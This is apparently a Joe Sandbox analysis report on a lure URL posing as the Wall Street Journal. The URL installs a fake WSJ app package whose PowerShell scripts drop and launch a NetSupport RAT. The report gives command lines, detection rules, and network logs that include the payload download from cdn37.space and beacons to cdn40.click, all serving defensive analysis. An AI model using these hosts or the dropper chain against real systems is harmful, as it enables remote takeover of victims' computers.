Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://wsj.pm

Overview

General Information

Sample URL:http://wsj.pm
Analysis ID:1431705
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to open files direct via NTFS file id
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Windows App Activity
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://wsj.pm/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • AppInstaller.exe (PID: 8144 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca MD5: A313FDADDB051A471645685386471EE2)
  • AppInstallerFullTrustAppServiceClient.exe (PID: 6156 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy MD5: 2FEB69B26AB8966F050BA56641E8438A)
  • PsfLauncher64.exe (PID: 720 cmdline: "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe" MD5: C55F8E39801444DEBA32F5B94B5F1EB8)
    • PsfRunDll64.exe (PID: 1160 cmdline: "PsfRunDll64.exe" MD5: 8466F69926A22670DCF6515A4FC3C054)
    • powershell.exe (PID: 2360 cmdline: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • client32.exe (PID: 7408 cmdline: "C:\ProgramData\netsupport\client\client32.exe" MD5: 9497AECE91E1CCC495CA26AE284600B9)
        • chrome.exe (PID: 7828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
          • chrome.exe (PID: 3752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • rundll32.exe (PID: 7276 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • AppInstaller.exe (PID: 1592 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca MD5: A313FDADDB051A471645685386471EE2)
  • AppInstallerFullTrustAppServiceClient.exe (PID: 3356 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy MD5: 2FEB69B26AB8966F050BA56641E8438A)
  • PsfLauncher64.exe (PID: 4768 cmdline: "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe" MD5: C55F8E39801444DEBA32F5B94B5F1EB8)
    • PsfRunDll64.exe (PID: 6400 cmdline: "PsfRunDll64.exe" MD5: 8466F69926A22670DCF6515A4FC3C054)
    • powershell.exe (PID: 3784 cmdline: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\netsupport\client\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\ProgramData\netsupport\client\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\ProgramData\netsupport\client\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\ProgramData\netsupport\client\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\ProgramData\netsupport\client\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000020.00000003.1941488421.00000000008BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000020.00000002.2526275885.000000000270C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 20 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      32.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        32.2.client32.exe.6c1b0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          32.2.client32.exe.74670000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            26.2.powershell.exe.23162f37328.2.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              26.2.powershell.exe.23162f2d0d8.4.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 6 entries

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi64_2564.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                                  amsi64_7788.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                                    amsi64_7788.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                    • 0x5b6:$b2: ::FromBase64String(
                                    • 0x94a:$b2: ::FromBase64String(
                                    • 0xd99:$b2: ::FromBase64String(
                                    • 0x1472:$b2: ::FromBase64String(
                                    • 0x298:$s1: -join
                                    • 0xd9ac:$s1: -join
                                    • 0x7158:$s4: +=
                                    • 0x721a:$s4: +=
                                    • 0xb441:$s4: +=
                                    • 0xd55e:$s4: +=
                                    • 0xd848:$s4: +=
                                    • 0xd98e:$s4: +=
                                    • 0x1b083:$s4: +=
                                    • 0x1b187:$s4: +=
                                    • 0x1e5e3:$s4: +=
                                    • 0x1ecc3:$s4: +=
                                    • 0x1f179:$s4: +=
                                    • 0x1f1ce:$s4: +=
                                    • 0x1f442:$s4: +=
                                    • 0x1f471:$s4: +=
                                    • 0x1f9b9:$s4: +=

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7788, TargetFilename: C:\ProgramData\netsupport\client\AudioCapture.dll
                                    Sigma detected: Potentially Suspicious Windows App Activity
                                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", CommandLine: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe" , ParentImage: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, ParentProcessId: 720, ParentProcessName: PsfLauncher64.exe, ProcessCommandLine: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", ProcessId: 2360, ProcessName: powershell.exe
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", CommandLine: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe" , ParentImage: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, ParentProcessId: 720, ParentProcessName: PsfLauncher64.exe, ProcessCommandLine: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", ProcessId: 2360, ProcessName: powershell.exe

                                    Snort Signatures

                                    Timestamp:04/25/24-16:59:39.263956
                                    SID:2052014
                                    Source Port:49799
                                    Destination Port:443
                                    Protocol:TCP
                                    Classtype:A Network Trojan was detected
                                    Timestamp:04/25/24-16:59:38.283783
                                    SID:2052014
                                    Source Port:49798
                                    Destination Port:443
                                    Protocol:TCP
                                    Classtype:A Network Trojan was detected
                                    Timestamp:04/25/24-16:59:38.117965
                                    SID:2052006
                                    Source Port:53350
                                    Destination Port:53
                                    Protocol:UDP
                                    Classtype:A Network Trojan was detected

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus detection for URL or domain
                                    Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                                    Source: http://pesterbdd.com/images/Pester.png8Avira URL Cloud: Label: malware
                                    Multi AV Scanner detection for domain / URL
                                    Source: cdn40.clickVirustotal: Detection: 5%Perma Link
                                    Source: http://pesterbdd.com/images/Pester.png8Virustotal: Detection: 11%Perma Link
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,32_2_110AC600
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\netsupport\client\msvcr100.dllJump to behavior
                                    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49780 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49784 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49786 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 40.126.28.14:443 -> 192.168.2.17:49785 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49788 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49792 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49797 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 86.104.72.157:443 -> 192.168.2.17:49798 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49807 version: TLS 1.2
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfLauncher64.pdb source: PsfLauncher64.exe, 00000014.00000000.1745032807.00007FF6C367E000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfRuntime64.pdb source: PsfRunDll64.exe, 00000016.00000002.1749156584.00007FFA1B0EF000.00000002.00000001.01000000.0000000F.sdmp
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2653892978.000000006C1B2000.00000002.00000001.01000000.00000019.sdmp, PCICHEK.DLL.26.dr
                                    Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 0000001A.00000002.1968531120.00000231631AF000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2639330298.000000006C0F1000.00000020.00000001.01000000.0000001A.sdmp, msvcr100.dll.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.26.dr
                                    Source: Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2654970934.0000000074675000.00000002.00000001.01000000.00000018.sdmp, pcicapi.dll.26.dr
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe, 00000016.00000000.1747207751.00007FF695D50000.00000002.00000001.01000000.00000010.sdmp
                                    Source: Binary string: 0\1100\client32\Release\client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
                                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000001A.00000002.2187481682.00000231793A5000.00000004.00000020.00020000.00000000.sdmp
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102D1B3
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,32_2_11069760
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,32_2_11123690
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,32_2_11108090
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,32_2_110BC0E0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102CE84
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,32_2_11064EF0

                                    Networking

                                    barindex
                                    Snort IDS alert for network traffic
                                    Source: TrafficSnort IDS: 2052006 ET TROJAN Suspected FIN7 Related domain in DNS Lookup (cdn37 .space) 192.168.2.17:53350 -> 1.1.1.1:53
                                    Source: TrafficSnort IDS: 2052014 ET TROJAN Suspected Fin7 Related Domain (cdn37 .space) in TLS SNI 192.168.2.17:49798 -> 86.104.72.157:443
                                    Source: TrafficSnort IDS: 2052014 ET TROJAN Suspected Fin7 Related Domain (cdn37 .space) in TLS SNI 192.168.2.17:49799 -> 86.104.72.157:443
                                    Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
                                    Source: global trafficHTTP traffic detected: GET /files/netsupport25.zip HTTP/1.1Host: cdn37.space
                                    Source: global trafficHTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
